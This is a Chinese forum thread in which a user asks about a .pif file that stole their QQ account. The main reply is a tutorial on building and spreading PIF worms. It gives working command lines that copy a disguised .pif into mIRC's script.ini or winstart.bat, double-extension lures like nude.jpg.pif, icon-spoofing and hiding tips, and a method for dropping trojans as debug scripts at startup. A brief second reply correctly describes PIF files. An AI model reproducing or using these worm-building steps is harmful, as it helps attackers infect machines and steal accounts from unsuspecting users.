*.pif是什么病毒,高手进!

网友传给我一个扩展名为pif的文件,运行后我的QQ就被盗了。我只知道pif是dos的快捷方式,有哪位高手知道*.pif是什么病毒。

2768 浏览 2 回复
  pif   文件   一个   mirc   病毒  

回复

    Pif 可以用来指向一个dos程序,也就是dos程序的快捷方式,比如可以连到一个病毒或者
    木马.
    它自己也可能就是一个蠕虫,让我们深入的研究一下...
    [你要会点 DOS 下的 batch 语言(批处理文件) 和 知道怎样使用 Debug]
    这里有下面提到的几个pif病毒文件,点击这里下载.在这察看源代码!
    [第一章:] - PIF 蠕虫 :
    Pif不可以在Win9x下编辑;要生成一个Pif文件,只要右击鼠标,指向"新建"->"快捷方式"
    .
    会跳出一个窗口,我们在命令行输入 C:\command.com .然后为我们的蠕虫起一个"wormt
    est" 的名字,然后回车,OK!
    (你也可以使用一个存在的pif文件)
    右击 pif 文件,选择"属性"; 接着点击程序.这就是控制 pif 文件的主要场所了.在我们
    接着学之前,让我们看看我的
    Pif 蠕虫中的几个命令...
    例子:
    IRC-WORM Elsa:
    C:\COMMAND.COM /C copy C:\mirc\download\cuteELSA.JPG.pif C:\mirc\script.ini /Y
    C:\MIRC
    IRC-WORM Elsa.b:
    C:\COMMAND.COM /C copy C:\mirc\download\EmmaPeel.HTML.pif C:\mirc\script.ini
    /
    C:\MIRC
    IRC-Worm.Movie.c:
    %comspec% /c copy c:\mirc\download\X_PASS.TXT.pif %windir%\winstart.bat
    C:\

    IBLIS_FinalVersion:

    %comspec% /c copy IBLIS_~1.pif ..\script.ini /Y
    留个空白
    现在,我想你已经大概明白是怎么回事了..
    让我们回到我们的 wormtest.pif 文件...
    先为你的蠕虫起一个好听的名字.比如: nude.jpg.pif .你只要把你的pif文件改名为nu
    de.jpg .
    而且pif文件的后缀名一直是可视的,酷啊!(来个sex.jpg , sexwww.txt.来整整那些色
    狼)
    让我们到pif文件属性中的程序中来...

    a- 命令行 :

    Pif最好的功能之一就是命令行.虽然命令的长度受到了限制,但是我们仍然能做些有趣的
    事......
    但是重要的一条是,蠕虫文件已经存在于电脑的某个地方了,mIRC 和 Windows的目录都是
    我们的
    主要攻击对象...
    你只能用command.com这个文件来完成我们的作品,你只要看看上面的四条命令,就会理解
    了,当然
    最后一个也是最好的一个,因为即使不是 C:\mirc\ 目录,它也能把脚本拷过去,而且它也
    是最小
    的一个 :) .如果你要把 pif 文件拷成mIRC的脚本文件,那么你就要编辑它,加入一些
    脚本命令;如果你把pif拷贝到winstart.bat,那么就需要一些dos命令...
    只要仔细看看上面下载的4个pif文件,你就会明白是什么原理了...

    b- 工作目录 :

    最好的方法就是留下空白 ... ;)

    c- 运行 :

    在这,你必须要选择一项,蠕虫运行的时候,就会跳出一个窗口,不用担心 :)

    d- 改变图标 :

    这是一个非常好的功能,我建议你选择一个大家熟悉的windows下程序的图标,比如画图,
    记事本...
    通过这些属性,我们就可以把一个没用的快捷方式改造成一个非常好的蠕虫程序 :)
    最后的工作就是编辑 pif 文件,加入一些脚本或者 dos 命令.打开和编辑pif文件,要通
    过dos下的 edit 来完成.你可
    以在蠕虫中加入一些命令,当把script.ini文件拷到 mIRC 的目录下的时候.mIRC.exe 就
    会加载它,并且运行指令.
    bat文件的原理也是一样的.

    注意要点:

    * 在windows启动时自动运行.
    * 保存一个备份文件(不是蠕虫的主程序,否则可以轻易的删除掉).
    * 要隐藏的很好,不能被发现
    * 目标是 Mirc & Pirch
    [第二章] - 传播 病毒 或 木马 :
    那么你是怎样通过pif文件来远程安装木马和传播病毒的呢?
    其实这很简单,你只要做一个像下面这样的 pif 命令行 :
    %comspec% /c copy sexbmp~1.pif %windir%\winstart.bat
    C:\
    把 pif 的文件名改成 sex.bmp, 编辑它.把你的病毒或者木马转换成 Debug 脚本.
    Pif 文件将会把自己拷贝成 winstart.bat 在 %windir% 的目录中,下面就简单了...
    你还要加入一些 debug 脚本到 winstart.bat 中,和其它的一些功能.(如让 windows 启
    动时自动运行).

    注意要点:

    • 首先,把你的病毒或者木马转换成 debug 脚本
    • 把 debug 放到 winstart.bat 文件中
    • .bat文件中包含了 debug 脚本
    • 接着,他就会运行 Debug 通过 debug 脚本来生成 exe 文件
    • 最后,运行 exe 文件,或者修改注册表来运行它.
      总结:千面杀手杀手的木马应该是保存在pif文件中的,它应该是由作者自己写的,应为de
      bug脚本是越小越好.所以普通杀毒软件应该能够应付.至于传播可能使用了泡沫男孩和美
      丽沙的传染方式,通过e-mail传播,也可能使用了最新的微软的Outlook 的漏洞. 总之,大
      家不要闻毒丧胆.病毒只是一个优秀的小程序.

    张勇

    *.pif
    program information file
    程序信息文件(不是病毒)
    病毒可以隐藏在*.PIF,就像隐藏在.exe,.bat,.jpg
    一样.

    闫荷

相关提问


友情链接: